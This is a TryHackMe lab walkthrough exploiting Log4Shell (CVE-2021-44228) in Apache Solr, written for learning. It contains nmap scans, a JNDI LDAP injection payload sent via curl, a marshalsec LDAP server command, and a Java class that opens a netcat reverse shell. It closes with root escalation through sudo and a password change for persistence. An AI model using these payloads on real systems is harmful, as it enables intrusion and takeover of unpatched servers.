Tryhackme Solar Exploiting Log4j

With CVE-2021-44228 vulerability (Log4Shell) posing a major threat to Java applications hosted on the internet with a CVSS score of 10.0 critical designation. Remote code execution can be accomplished by taking advantage of a Java Naming and Directory Interface (JNDI) within Log4j logging packages. Solar provides a test scenairo for exploitation of vulnerability.


Legal Notice && Usage: The information provided by executeatwill is to be used for educational purposes only. The website creator and/or editor is in no way responsible for any misuse of the information provided. All the information on this website is meant to help the reader develop penetration testing and vulnerability aptitude to prevent attacks discussed. In no way should you use the information to cause any kind of damage directly or indirectly. Information provided by this website is to be regarded from an “ethical hacker” standpoint. Only preform testing on systems you OWN and/or have expressed written permission. Use information at your own risk. By continuing, you acknowledge the aforementioned user risk/responsibilities.


Reconnaissance

Enumeration

Nmap scan:

1
nmap -v -p- 10.10.212.184

futher enumerate port 8983

1
nmap -sV -p 8983 10.10.212.184

Discovery

Http Server

navigate to http://10.10.212.184:8983

Argument set for -Dsolr.log.dir set to /var/solr/logs

Downloaded Task Files

within the solr.log file we can discover and example of the solr log file that is normally generated.

Proof of Concept

navigate to http://10.10.212.184:8983/solr/admin/cores

log4j payload

1
${jndi:ldap://ATTACKERCONTROLLEDHOST}

Creating a test scenario

Adding a callback request from target to local attacking machine would allow a local listener to capture any incoming request

Listener setup on port 9999 locally and payload is sent via curl:

1
curl 'http://10.10.212.184:8983/solr/admin/cores?foo=$\{jndi:ldap://10.10.159.175:9999\}'

successful connection from target system to attacking system can be established by crafted injection to the ?foo parameter.

setup local LDAP server

1
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://YOUR.ATTACKER.IP.ADDRESS:8000/#Exploit"

craft java reverse shell on attacking machine create an exploit.

1
2
3
4
5
6
7
8
9
public class Exploit {
    static {
        try {
            java.lang.Runtime.getRuntime().exec("nc -e /bin/bash YOUR.ATTACKER.IP.ADDRESS 9999");
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

compile java exploit code:

1
javac Exploit.java -source 8 -target 8

newly created Exploit.class file that will be hosted locally and sent to target via the jndi payload.

send payload

1
curl 'http://10.10.212.184:8983/solr/admin/cores?foo=$\{jndi:ldap://10.6.124.83:1389/Exploit\}'

Persistence

Establishing a foothold on box as solr

Check sudo sudo -l

called "/bin/bash" with sudo for a root shell.

changing password of solr for the ability to ssh into target.